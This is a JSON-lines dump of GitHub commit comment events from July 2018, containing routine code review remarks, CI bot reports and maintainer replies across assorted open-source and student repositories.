{"id":"7945320465","type":"CommitCommentEvent","actor":{"login":"pplutap"},"repo":{"name":"Kubecko/Marcin-Kubecko-kodilla-java"},"payload":{"comment":{"id":29660543,"position":6,"line":27,"path":"kodilla-patterns/src/main/java/com/kodilla/patterns/factory/tasks/DrivingTask.java","commit_id":"6acfe65b0a3df64dbb6d35b24e426216ca7c9a14","created_at":"2018-07-10T17:34:06Z","updated_at":"2018-07-10T17:34:06Z","author_association":"NONE","body":"W klasie powinna istnieć prywatna zmienna typu boolean o nazwie np executed. Metoda executeTask powinna ustawiać wartość true w tej zmiennej. Metoda isTaskExecuted powinna zwracać wartość tej zmiennej.\r\nTo samo dla wszystkich klas implementujących interfejs Task"}},"created_at":"2018-07-10T17:34:06Z"}
{"id":"7945338851","type":"CommitCommentEvent","actor":{"login":"woffs"},"repo":{"name":"peti/nixpkgs"},"payload":{"comment":{"id":29660585,"position":514,"line":2745,"path":"pkgs/development/haskell-modules/configuration-hackage2nix.yaml","commit_id":"62f9c0a66a36840abf07d1bf14f3597c1d076b31","created_at":"2018-07-10T17:37:41Z","updated_at":"2018-07-10T17:37:41Z","author_association":"NONE","body":"I've fixed build with lts-12.0 in 0.3.3.1"}},"created_at":"2018-07-10T17:37:41Z"}
{"id":"7945339716","type":"CommitCommentEvent","actor":{"login":"tomwayson"},"repo":{"name":"Esri/arcgis-rest-js"},"payload":{"comment":{"id":29660589,"position":4,"line":25,"path":"packages/arcgis-rest-auth/src/UserSession.ts","commit_id":"2e582e12fc3e5bf9688b3ba80da33e4a5a5fa84f","created_at":"2018-07-10T17:37:51Z","updated_at":"2018-07-10T17:37:51Z","author_association":"MEMBER","body":"this is a type, so we should drop the `I`, right?"}},"created_at":"2018-07-10T17:37:51Z"}
{"id":"7945340089","type":"CommitCommentEvent","actor":{"login":"briantschu"},"repo":{"name":"uwmweb/uwmcms"},"payload":{"comment":{"id":29660592,"position":null,"line":null,"path":null,"commit_id":"a19efbf344b688344303d8f20ed9627464b505a1","created_at":"2018-07-10T17:37:55Z","updated_at":"2018-07-10T17:37:55Z","author_association":"CONTRIBUTOR","body":"Hey @sodacrackers BLT should already take care of creating a file where Twig Cache can be disabled via uwmed/settings/local.settings.php.\r\n\r\nThe second to last line in settings.php references:\r\n`require DRUPAL_ROOT . \"/../vendor/acquia/blt/settings/blt.settings.php\";`\r\n\r\nWithin blt.settings.php, we have:\r\n```\r\n  // Load local machine settings.\r\n  if (file_exists(DRUPAL_ROOT . \"/sites/$site_dir/settings/local.settings.php\")) {\r\n    require DRUPAL_ROOT . \"/sites/$site_dir/settings/local.settings.php\";\r\n  }\r\n```\r\n\r\nIt looks like local.settings.php is an untracked file, though, so you may have to copy default.local.settings.php to local.settings.php and uncomment the lines to turn off caching if it's not there already."}},"created_at":"2018-07-10T17:37:55Z"}
{"id":"7945341004","type":"CommitCommentEvent","actor":{"login":"tonyxu-io"},"repo":{"name":"iammapping/alfred-uploader"},"payload":{"comment":{"id":29660596,"position":null,"line":null,"path":null,"commit_id":"fc0a8873f0f75f250d9247e144c642d272e1fa1e","created_at":"2018-07-10T17:38:06Z","updated_at":"2018-07-10T17:38:06Z","author_association":"NONE","body":"Great work! 😀Now I should think of my workflow adding support for uploading local files."}},"created_at":"2018-07-10T17:38:06Z"}
{"id":"7945343546","type":"CommitCommentEvent","actor":{"login":"origindesign"},"repo":{"name":"origindesign/skitaos"},"payload":{"comment":{"id":29660600,"position":null,"line":null,"path":null,"commit_id":"87cab77f0388c07720f1ec423c0fafaf2bd70163","created_at":"2018-07-10T17:38:34Z","updated_at":"2018-07-10T17:38:34Z","author_association":"OWNER","body":"Created multidev environment [ski-taos#ci-21](https://dashboard.pantheon.io/sites/22e63f3f-bdff-4894-a158-a29f219020d1#ci-21).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-21-ski-taos.pantheonsite.io/)"}},"created_at":"2018-07-10T17:38:34Z"}
{"id":"7945345617","type":"CommitCommentEvent","actor":{"login":"caspermadara"},"repo":{"name":"bitfinexcom/bitfinex-api-node"},"payload":{"comment":{"id":29660608,"position":null,"line":null,"path":null,"commit_id":"2b9c25fff403d393f0a2a2c94f59c9aa909b134f","created_at":"2018-07-10T17:38:58Z","updated_at":"2018-07-10T17:38:58Z","author_association":"NONE","body":"hey, mates, its worthy to push updates to npm.\r\nbecause right now people like me are forced to push new updates (new packages actually) to npm by themselves. and I will push your package with missing things under my name (because I want npm to manage my dependencies). didn't want to though"}},"created_at":"2018-07-10T17:38:58Z"}
{"id":"7945349611","type":"CommitCommentEvent","actor":{"login":"zulucrypto"},"repo":{"name":"trezor/trezor-mcu"},"payload":{"comment":{"id":29660619,"position":45,"line":158,"path":"firmware/stellar.c","commit_id":"520cd69f25e4f34504ea03897ee2b6b3242e75e9","created_at":"2018-07-10T17:39:48Z","updated_at":"2018-07-10T17:39:48Z","author_association":"CONTRIBUTOR","body":"This can't be removed from the operation because the source account for the overall transaction and each operation can differ.\r\n\r\nThis comes up fairly frequently when doing multisig transactions. Here's a use case:\r\n\r\nConsider two accounts:\r\n\r\n`GTREZOR` - Secure \"master account\" generated by the Trezor\r\n`GESCROW` - Escrow account not managed by the Trezor but that `GTREZOR` has been added as a signer for\r\n\r\nIn this case, the submitted transaction would look like:\r\n\r\n```\r\nTransaction\r\n  Source Account: GTREZOR (specified by address_n)\r\n\r\n  Operations:\r\n    #1 - Payment\r\n    Source Account: GESCROW (sent as the string)\r\n```\r\n\r\nAn empty operation-level source account field means that the Stellar protocol should default to the transaction-level source account, which is why it's encoded as `false` when one isn't specified.\r\n\r\nI will work on adding a unit test that covers this case.\r\n\r\nSome more background: \r\n\r\n* https://www.stellar.org/developers/guides/concepts/operations.html#transactions-involving-multiple-accounts\r\n* https://www.stellar.org/developers/guides/concepts/multi-sig.html"}},"created_at":"2018-07-10T17:39:48Z"}
{"id":"7945350276","type":"CommitCommentEvent","actor":{"login":"jeffdill2"},"repo":{"name":"ammoready/rsr_group"},"payload":{"comment":{"id":29660622,"position":null,"line":null,"path":null,"commit_id":"097b72514599d116da0b87ab5524b233f348420b","created_at":"2018-07-10T17:39:55Z","updated_at":"2018-07-10T17:39:55Z","author_association":"NONE","body":"![truffle-shuffle](https://user-images.githubusercontent.com/4378228/42527456-b91f1698-8446-11e8-8ecb-c0f5e7edaf7a.gif)\r\n"}},"created_at":"2018-07-10T17:39:55Z"}
{"id":"7945351182","type":"CommitCommentEvent","actor":{"login":"leventekobor94"},"repo":{"name":"green-fox-academy/KingaBernhardt"},"payload":{"comment":{"id":29660623,"position":13,"line":33,"path":"week-08/day-2/ListingTodos/ListingTodos/Startup.cs","commit_id":"909a69396e5d2fc7da7a8cc0d887c9b7bf10900d","created_at":"2018-07-10T17:40:05Z","updated_at":"2018-07-10T17:40:05Z","author_association":"NONE","body":"romve all unused coe, this is a major issue in an exam\r\n"}},"created_at":"2018-07-10T17:40:05Z"}
{"id":"7945353003","type":"CommitCommentEvent","actor":{"login":"rfiilho"},"repo":{"name":"rfiilho/Spika"},"payload":{"comment":{"id":29660624,"position":null,"line":null,"path":null,"commit_id":"37de62b3829d8311e0c83bc8543e465e7961bdc5","created_at":"2018-07-10T17:40:26Z","updated_at":"2018-07-10T17:40:26Z","author_association":"OWNER","body":"Fix"}},"created_at":"2018-07-10T17:40:26Z"}
{"id":"7945353378","type":"CommitCommentEvent","actor":{"login":"mcohoon"},"repo":{"name":"python-social-auth/social-app-django"},"payload":{"comment":{"id":29660627,"position":null,"line":null,"path":null,"commit_id":"720d87ce8d7aa9bef3c313834a4fe0dca6bad955","created_at":"2018-07-10T17:40:30Z","updated_at":"2018-07-10T17:40:30Z","author_association":"NONE","body":"Any word when this might make it into a release?"}},"created_at":"2018-07-10T17:40:30Z"}
{"id":"7945353546","type":"CommitCommentEvent","actor":{"login":"leventekobor94"},"repo":{"name":"green-fox-academy/KingaBernhardt"},"payload":{"comment":{"id":29660629,"position":1,"line":5,"path":"week-08/day-2/ListingTodos/ListingTodos/Views/Todo/List.cshtml","commit_id":"909a69396e5d2fc7da7a8cc0d887c9b7bf10900d","created_at":"2018-07-10T17:40:32Z","updated_at":"2018-07-10T17:40:32Z","author_association":"NONE","body":"`List.cshtml` looks good"}},"created_at":"2018-07-10T17:40:32Z"}
{"id":"7945357636","type":"CommitCommentEvent","actor":{"login":"Southclaws"},"repo":{"name":"pawn-lang/YSI-Includes"},"payload":{"comment":{"id":29660631,"position":null,"line":null,"path":null,"commit_id":"3baec21f8ca0bcf3c44473904fbc624145773a97","created_at":"2018-07-10T17:41:20Z","updated_at":"2018-07-10T17:41:20Z","author_association":"CONTRIBUTOR","body":"I'm all for \"one way to do things\" and libraries not attempting to be \"clever\" or adapting to various configurations. Documentation should be enough!"}},"created_at":"2018-07-10T17:41:20Z"}
{"id":"7945359340","type":"CommitCommentEvent","actor":{"login":"leventekobor94"},"repo":{"name":"green-fox-academy/KingaBernhardt"},"payload":{"comment":{"id":29660637,"position":5,"line":43,"path":"week-08/day-2/ListingTodos/ListingTodos/Controllers/AssigneController.cs","commit_id":"909a69396e5d2fc7da7a8cc0d887c9b7bf10900d","created_at":"2018-07-10T17:41:41Z","updated_at":"2018-07-10T17:41:41Z","author_association":"NONE","body":"friendy question, `[HttpGet(\"/deleteAssigne/{id}\")]` would do the same right?"}},"created_at":"2018-07-10T17:41:41Z"}
{"id":"7945360525","type":"CommitCommentEvent","actor":{"login":"leventekobor94"},"repo":{"name":"green-fox-academy/KingaBernhardt"},"payload":{"comment":{"id":29660640,"position":5,"line":43,"path":"week-08/day-2/ListingTodos/ListingTodos/Controllers/AssigneController.cs","commit_id":"909a69396e5d2fc7da7a8cc0d887c9b7bf10900d","created_at":"2018-07-10T17:41:55Z","updated_at":"2018-07-10T17:41:55Z","author_association":"NONE","body":"also, nice naming refactor\r\n"}},"created_at":"2018-07-10T17:41:55Z"}
{"id":"7945365065","type":"CommitCommentEvent","actor":{"login":"leventekobor94"},"repo":{"name":"green-fox-academy/KingaBernhardt"},"payload":{"comment":{"id":29660650,"position":null,"line":null,"path":null,"commit_id":"412adead68a7bd6360b4830c38ff9b2ae5d812a5","created_at":"2018-07-10T17:42:47Z","updated_at":"2018-07-10T17:42:47Z","author_association":"NONE","body":"in `AssigneController.cs` at the end of a file, there are some unramoved enters, do not forget to remove them in the exam."}},"created_at":"2018-07-10T17:42:47Z"}
{"id":"7945366147","type":"CommitCommentEvent","actor":{"login":"rsoesemann"},"repo":{"name":"Up2Go/cprm-analytics"},"payload":{"comment":{"id":29660652,"position":5,"line":5,"path":"src/wave/CPRM_EA__Customer_Sales_Overview1.xmd.wdpr","commit_id":"a34906b226251aad180042d992d51ed02322c2ec","created_at":"2018-07-10T17:43:00Z","updated_at":"2018-07-10T17:43:00Z","author_association":"COLLABORATOR","body":"Why do we have two of those?"}},"created_at":"2018-07-10T17:43:00Z"}
{"id":"7945368382","type":"CommitCommentEvent","actor":{"login":"leventekobor94"},"repo":{"name":"green-fox-academy/KingaBernhardt"},"payload":{"comment":{"id":29660654,"position":null,"line":null,"path":null,"commit_id":"909a69396e5d2fc7da7a8cc0d887c9b7bf10900d","created_at":"2018-07-10T17:43:24Z","updated_at":"2018-07-10T17:43:24Z","author_association":"NONE","body":"both `AssigneController.cs` and `TodoController.cs` endpoints skeletons are looking good"}},"created_at":"2018-07-10T17:43:24Z"}
{"id":"7945371799","type":"CommitCommentEvent","actor":{"login":"leventekobor94"},"repo":{"name":"green-fox-academy/KingaBernhardt"},"payload":{"comment":{"id":29660663,"position":1,"line":10,"path":"week-08/day-2/ListingTodos/ListingTodos/Repository/TodoContext.cs","commit_id":"d479619bc9b0be71a96627c0a3483a6e522b29e0","created_at":"2018-07-10T17:44:04Z","updated_at":"2018-07-10T17:44:04Z","author_association":"NONE","body":"this `DbContext` looks good as well"}},"created_at":"2018-07-10T17:44:04Z"}
{"id":"7945372127","type":"CommitCommentEvent","actor":{"login":"capitains-hook"},"repo":{"name":"PerseusDL/canonical-greekLit"},"payload":{"comment":{"id":29660664,"position":null,"line":null,"path":null,"commit_id":"4f25e8fd7fa9e17f11b2f97389453b0ef4a75909","created_at":"2018-07-10T17:44:08Z","updated_at":"2018-07-10T17:44:08Z","author_association":"NONE","body":"## Global\n\n| Changed       |   Status |\n|:--------------|---------:|\n| `coverage`    |     0.12 |\n| `texts_total` |    -4    |\n\n## Words\n\n| Changed   |   Status |\n|:----------|---------:|\n| `grc`     |     -246 |\n\n## Units\n\n| Changed                                                 | Status   |\n|:--------------------------------------------------------|:---------|\n| `./data/tlg0007/tlg074/tlg0007.tlg074.perseus-eng1.xml` | Deleted  |\n| `./data/tlg0007/tlg074/tlg0007.tlg074.perseus-eng2.xml` | Deleted  |\n| `./data/tlg0007/tlg074/tlg0007.tlg074.perseus-grc1.xml` | Deleted  |\n| `./data/tlg0023/tlg001/tlg0023.tlg001.perseus-grc1.xml` | Deleted  |\n\n*[Hook UI build recap](http://ci.perseids.org/repo/PerseusDL/canonical-greekLit/4436)*\n"}},"created_at":"2018-07-10T17:44:08Z"}
{"id":"7945373778","type":"CommitCommentEvent","actor":{"login":"erikerikson"},"repo":{"name":"Nordstrom/serverless-artillery"},"payload":{"comment":{"id":29660666,"position":2,"line":1,"path":"lib/serverless-fx.js","commit_id":"a81eeb2c7a2ecae87329ac661a5087c980c95ec0","created_at":"2018-07-10T17:44:27Z","updated_at":"2018-07-10T17:44:27Z","author_association":"MEMBER","body":"Very sorry we missed this in review!"}},"created_at":"2018-07-10T17:44:27Z"}
{"id":"7945374056","type":"CommitCommentEvent","actor":{"login":"tpalanimca"},"repo":{"name":"tpalanimca/Project2"},"payload":{"comment":{"id":29660667,"position":null,"line":null,"path":null,"commit_id":"95dda0d5e1b800ca9f64e4228a302cfbbf7ac6b7","created_at":"2018-07-10T17:44:31Z","updated_at":"2018-07-10T17:44:31Z","author_association":"OWNER","body":"this is for the demo purpose"}},"created_at":"2018-07-10T17:44:31Z"}
{"id":"7945378237","type":"CommitCommentEvent","actor":{"login":"devvipin"},"repo":{"name":"devvipin/coursera-test"},"payload":{"comment":{"id":29660685,"position":null,"line":null,"path":null,"commit_id":"438e7c4ce22d07039552ce70b0ac34c36c34e4d7","created_at":"2018-07-10T17:45:18Z","updated_at":"2018-07-10T17:45:18Z","author_association":"OWNER","body":"qa"}},"created_at":"2018-07-10T17:45:18Z"}
{"id":"7945381076","type":"CommitCommentEvent","actor":{"login":"rsoesemann"},"repo":{"name":"Up2Go/cprm-analytics"},"payload":{"comment":{"id":29660688,"position":12,"line":12,"path":"src/waveTemplates/CPRM_EA__Customer_Sales_Overview/dataflow/Customer_Sales_OverviewDataflow.json","commit_id":"a34906b226251aad180042d992d51ed02322c2ec","created_at":"2018-07-10T17:45:49Z","updated_at":"2018-07-10T17:45:49Z","author_association":"COLLABORATOR","body":"Looks like we are still not using the packaged status field. Why else is there no namespace and the others have one?"}},"created_at":"2018-07-10T17:45:49Z"}
{"id":"7945382095","type":"CommitCommentEvent","actor":{"login":"Vlad-00003"},"repo":{"name":"Vlad-00003/SlayTheSpire-Russification"},"payload":{"comment":{"id":29660692,"position":84,"line":491,"path":"rus/relics.json","commit_id":"4dbef9bf9cca269776ef54f09f006ef9c78982b0","created_at":"2018-07-10T17:46:01Z","updated_at":"2018-07-10T17:46:01Z","author_association":"OWNER","body":"Надо не забыть поменять кавычки на «» ...."}},"created_at":"2018-07-10T17:46:01Z"}
{"id":"7945385227","type":"CommitCommentEvent","actor":{"login":"amirebrahimi"},"repo":{"name":"Unity-Technologies/AutoLOD"},"payload":{"comment":{"id":29660700,"position":null,"line":null,"path":null,"commit_id":"7959d5f78e3fa722b64f276ddec71953fd0f2378","created_at":"2018-07-10T17:46:37Z","updated_at":"2018-07-10T17:46:37Z","author_association":"COLLABORATOR","body":"Yeah, I had to switch because of authentication for pushing. It's easier for me to have ssh. What error were you encountering?"}},"created_at":"2018-07-10T17:46:37Z"}
{"id":"7945385676","type":"CommitCommentEvent","actor":{"login":"chanulPARK"},"repo":{"name":"chanulPARK/ATOM"},"payload":{"comment":{"id":29660701,"position":null,"line":null,"path":null,"commit_id":"42a21f9c99357e6e1b3f0a4b18435e5383835fd2","created_at":"2018-07-10T17:46:42Z","updated_at":"2018-07-10T17:46:42Z","author_association":"OWNER","body":"디폴트페이지"}},"created_at":"2018-07-10T17:46:42Z"}
{"id":"7945386917","type":"CommitCommentEvent","actor":{"login":"leventekobor94"},"repo":{"name":"green-fox-academy/KingaBernhardt"},"payload":{"comment":{"id":29660703,"position":7,"line":17,"path":"week-08/day-2/ListingTodos/ListingTodos/Models/Assigne.cs","commit_id":"412adead68a7bd6360b4830c38ff9b2ae5d812a5","created_at":"2018-07-10T17:46:57Z","updated_at":"2018-07-10T17:46:57Z","author_association":"NONE","body":"for these kind of `string` operations i suggest you to use `String.Format()` but this is fine and working as well :)"}},"created_at":"2018-07-10T17:46:57Z"}
{"id":"7945387848","type":"CommitCommentEvent","actor":{"login":"wouterlucas"},"repo":{"name":"WebPlatformForEmbedded/meta-wpe"},"payload":{"comment":{"id":29660704,"position":null,"line":null,"path":null,"commit_id":"2d1a731919e08f3de3f7193085631c3ffe53bed0","created_at":"2018-07-10T17:47:08Z","updated_at":"2018-07-10T17:47:08Z","author_association":"CONTRIBUTOR","body":"Let's move this to a separate meta layer"}},"created_at":"2018-07-10T17:47:08Z"}
{"id":"7945390707","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29660707,"position":null,"line":null,"path":null,"commit_id":"4afb6a7cc0d84ccdaed29031a1a283532a41f090","created_at":"2018-07-10T17:47:40Z","updated_at":"2018-07-10T17:47:40Z","author_association":"NONE","body":"158922394_Issue#4431 (Nigusse) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (2812 of 2972 tests passed, 12 test warnings)\n\nMessages:\n\n * 11 tests had: AUD diffs.\n * 148 tests had: EIO diffs.\n * 145 tests had: Table big diffs.\n * 9 tests had: ESO small diffs.\n * 4 tests had: MTR small diffs.\n * 1 test had: ERR diffs.\n * 18 tests had: ESO big diffs.\n * 6 tests had: MTR big diffs.\n\nFailures:\n\n\nintegration Test Summary\n * Passed: 627\n * Failed: 1\n\nperformance Test Summary\n * Passed: 4\n * Failed: 13\n\nregression Test Summary\n * Passed: 497\n * Failed: 146\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-4afb6a7cc0d84ccdaed29031a1a283532a41f090-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-4afb6a7cc0d84ccdaed29031a1a283532a41f090-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-94.62%25-yellow.png)</a> \n"}},"created_at":"2018-07-10T17:47:40Z"}
{"id":"7945391814","type":"CommitCommentEvent","actor":{"login":"bossloper"},"repo":{"name":"evolution-cms/evolution"},"payload":{"comment":{"id":29660713,"position":null,"line":null,"path":null,"commit_id":"3032cd7170d5348cb480fdfbe161775a55a20a04","created_at":"2018-07-10T17:47:52Z","updated_at":"2018-07-10T17:47:52Z","author_association":"NONE","body":"or this one: https://github.com/evolution-cms/evolution/commit/6940d3d914d7ac4505fd028b87b45b3008b0e72e\r\n\r\nThere may be more!?\r\n"}},"created_at":"2018-07-10T17:47:52Z"}
{"id":"7945392695","type":"CommitCommentEvent","actor":{"login":"leventekobor94"},"repo":{"name":"green-fox-academy/KingaBernhardt"},"payload":{"comment":{"id":29660717,"position":null,"line":null,"path":null,"commit_id":"412adead68a7bd6360b4830c38ff9b2ae5d812a5","created_at":"2018-07-10T17:48:02Z","updated_at":"2018-07-10T17:48:02Z","author_association":"NONE","body":"General feedback, The whole project looks good to me. I think you managed to deal with most of the difficulties that you asked me earlier. I am happy to see this."}},"created_at":"2018-07-10T17:48:02Z"}
{"id":"7945393657","type":"CommitCommentEvent","actor":{"login":"zackhsi"},"repo":{"name":"Netflix/vizceral"},"payload":{"comment":{"id":29660720,"position":null,"line":null,"path":null,"commit_id":"28f7dc80c1a68169b57ebf021824e26df2de6bf0","created_at":"2018-07-10T17:48:12Z","updated_at":"2018-07-10T17:48:12Z","author_association":"NONE","body":"Hey, I'm curious about this commit. What level of support does the `maintenance` lifecycle value indicate? Also, what—if anything—have you replaced this with internally?\r\n\r\nThanks!"}},"created_at":"2018-07-10T17:48:12Z"}
{"id":"7945402355","type":"CommitCommentEvent","actor":{"login":"rsoesemann"},"repo":{"name":"Up2Go/cprm-analytics"},"payload":{"comment":{"id":29660742,"position":2,"line":2,"path":"src/wave/Customer_Sales_Overview1.wds.wdpr","commit_id":"a34906b226251aad180042d992d51ed02322c2ec","created_at":"2018-07-10T17:49:49Z","updated_at":"2018-07-10T17:49:49Z","author_association":"COLLABORATOR","body":"Looks like you are packaging a Dataset thing? Is that correct."}},"created_at":"2018-07-10T17:49:49Z"}
{"id":"7945403103","type":"CommitCommentEvent","actor":{"login":"viacoffee"},"repo":{"name":"ammoready/rsr_group"},"payload":{"comment":{"id":29660747,"position":14,"line":33,"path":"lib/rsr_group/catalog.rb","commit_id":"8a0c0c3d4f78fcbd033c521951249363a0f763cb","created_at":"2018-07-10T17:49:57Z","updated_at":"2018-07-10T17:49:57Z","author_association":"CONTRIBUTOR","body":"https://github.com/ammoready/rsr_group/commit/880ba567d4a06dd18268047323a635e28613e6fa"}},"created_at":"2018-07-10T17:49:57Z"}
{"id":"7945404808","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/oniguruma-feedstock"},"payload":{"comment":{"id":29660751,"position":null,"line":null,"path":null,"commit_id":"b40580cdf33ec5f5a18d49e458ba0eb6708eafe7","created_at":"2018-07-10T17:50:16Z","updated_at":"2018-07-10T17:50:16Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @kkos were added to conda-forge. Welcome to conda-forge!\n  Go to https://github.com/orgs/conda-forge/invitation see your invitation.\n\n- @kkos were added to this feedstock maintenance team.\n  You should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-10T17:50:16Z"}
{"id":"7945408885","type":"CommitCommentEvent","actor":{"login":"charlag"},"repo":{"name":"tuskyapp/Tusky"},"payload":{"comment":{"id":29660757,"position":null,"line":null,"path":null,"commit_id":"5ab4bc6bfa849128597db9af1042ab7652497056","created_at":"2018-07-10T17:51:00Z","updated_at":"2018-07-10T17:51:00Z","author_association":"COLLABORATOR","body":"CI says that Assert is deprecated. Maybe the wrong one is improted?\r\nAlso `whenTextContainsMultipleURLs_allURLsGetEllipsized` fails"}},"created_at":"2018-07-10T17:51:00Z"}
{"id":"7945415059","type":"CommitCommentEvent","actor":{"login":"ThatJoeMoore"},"repo":{"name":"byu-oit/handel"},"payload":{"comment":{"id":29660765,"position":null,"line":null,"path":null,"commit_id":"7d36975d3fba39c7c65ddea7dfc39700d5b7df24","created_at":"2018-07-10T17:52:10Z","updated_at":"2018-07-10T17:52:10Z","author_association":"MEMBER","body":"Ooops...I keep forgetting that I'm not writing for node 8 😅 "}},"created_at":"2018-07-10T17:52:10Z"}
{"id":"7945415521","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29660766,"position":null,"line":null,"path":null,"commit_id":"4afb6a7cc0d84ccdaed29031a1a283532a41f090","created_at":"2018-07-10T17:52:15Z","updated_at":"2018-07-10T17:52:15Z","author_association":"NONE","body":"158922394_Issue#4431 (Nigusse) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-4afb6a7cc0d84ccdaed29031a1a283532a41f090-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-10T17:52:15Z"}
{"id":"7945417768","type":"CommitCommentEvent","actor":{"login":"amcginlay"},"repo":{"name":"amcginlay/ops-manager-automation"},"payload":{"comment":{"id":29660773,"position":null,"line":null,"path":null,"commit_id":"1b41718c6ff637882226de90edcb7a69942912dc","created_at":"2018-07-10T17:52:39Z","updated_at":"2018-07-10T17:52:39Z","author_association":"OWNER","body":"Also switched from legacy to UAA token"}},"created_at":"2018-07-10T17:52:39Z"}
{"id":"7945419109","type":"CommitCommentEvent","actor":{"login":"EntOfMD"},"repo":{"name":"EntOfMD/notitia"},"payload":{"comment":{"id":29660775,"position":null,"line":null,"path":null,"commit_id":"e5812421184e7856ff7ae15700e8a48a9933eaee","created_at":"2018-07-10T17:52:51Z","updated_at":"2018-07-10T17:52:51Z","author_association":"OWNER","body":"I might come back to it, didn't feel it was needed at the time"}},"created_at":"2018-07-10T17:52:51Z"}
{"id":"7945422304","type":"CommitCommentEvent","actor":{"login":"jrsquared"},"repo":{"name":"Netflix/vizceral"},"payload":{"comment":{"id":29660786,"position":null,"line":null,"path":null,"commit_id":"28f7dc80c1a68169b57ebf021824e26df2de6bf0","created_at":"2018-07-10T17:53:27Z","updated_at":"2018-07-10T17:53:27Z","author_association":"CONTRIBUTOR","body":"We are not actively developing Vizceral, but I will still look at PR's and provide guidance.  We have not replaced it with anything internally."}},"created_at":"2018-07-10T17:53:27Z"}
{"id":"7945424747","type":"CommitCommentEvent","actor":{"login":"toddlipcon"},"repo":{"name":"boroknagyz/benchmarks"},"payload":{"comment":{"id":29660792,"position":57,"line":57,"path":"disk_read_seek.cpp","commit_id":"606b98560de65123cb91736f359a53f57726d519","created_at":"2018-07-10T17:53:55Z","updated_at":"2018-07-10T17:53:55Z","author_association":"NONE","body":"It would be better to use the underlying open() and read() functions instead of the libc FILE* wrappers here, since libc is doing its own implementation-defined buffering here. (I think 8kb based on a quick googling)"}},"created_at":"2018-07-10T17:53:55Z"}
{"id":"7945431880","type":"CommitCommentEvent","actor":{"login":"godric-cz"},"repo":{"name":"gamecon-cz/gamecon"},"payload":{"comment":{"id":29660804,"position":null,"line":null,"path":null,"commit_id":"ac2461b758f30d52747b71cda3bb7ed70cddd628","created_at":"2018-07-10T17:55:12Z","updated_at":"2018-07-10T17:55:12Z","author_association":"CONTRIBUTOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Mastercard: Židle org 1 a org 2](https://trello.com/c/N5LQguEV/579-mastercard-%C5%BEidle-org-1-a-org-2)"}},"created_at":"2018-07-10T17:55:12Z"}
{"id":"7945433434","type":"CommitCommentEvent","actor":{"login":"godric-cz"},"repo":{"name":"gamecon-cz/gamecon"},"payload":{"comment":{"id":29660807,"position":null,"line":null,"path":null,"commit_id":"afad43847344924a0d4a605446d260ae19ea0477","created_at":"2018-07-10T17:55:29Z","updated_at":"2018-07-10T17:55:29Z","author_association":"CONTRIBUTOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Mastercard: Židle org 1 a org 2](https://trello.com/c/N5LQguEV/579-mastercard-%C5%BEidle-org-1-a-org-2)"}},"created_at":"2018-07-10T17:55:29Z"}
{"id":"7945434481","type":"CommitCommentEvent","actor":{"login":"godric-cz"},"repo":{"name":"gamecon-cz/gamecon"},"payload":{"comment":{"id":29660810,"position":null,"line":null,"path":null,"commit_id":"71180084125b9d384152b49c47c12a24e9162aa5","created_at":"2018-07-10T17:55:41Z","updated_at":"2018-07-10T17:55:41Z","author_association":"CONTRIBUTOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Mastercard: Židle org 1 a org 2](https://trello.com/c/N5LQguEV/579-mastercard-%C5%BEidle-org-1-a-org-2)"}},"created_at":"2018-07-10T17:55:41Z"}
{"id":"7945436050","type":"CommitCommentEvent","actor":{"login":"Gnat008"},"repo":{"name":"Gnat008/nosquint"},"payload":{"comment":{"id":29660815,"position":48,"line":64,"path":"src/content/browser.js","commit_id":"9c902e58bac2d0553301708a0a05dc48438bba25","created_at":"2018-07-10T17:55:58Z","updated_at":"2018-07-10T17:55:58Z","author_association":"OWNER","body":"Note to self: Fix this..."}},"created_at":"2018-07-10T17:55:58Z"}
{"id":"7945437689","type":"CommitCommentEvent","actor":{"login":"taras96"},"repo":{"name":"antonkryvko/Front-End-Checklist"},"payload":{"comment":{"id":29660820,"position":null,"line":null,"path":null,"commit_id":"a2e4d3dc61c67bcac681ac38d866317eac36a326","created_at":"2018-07-10T17:56:17Z","updated_at":"2018-07-10T17:56:17Z","author_association":"NONE","body":"@antonkryvko що скажете?"}},"created_at":"2018-07-10T17:56:17Z"}
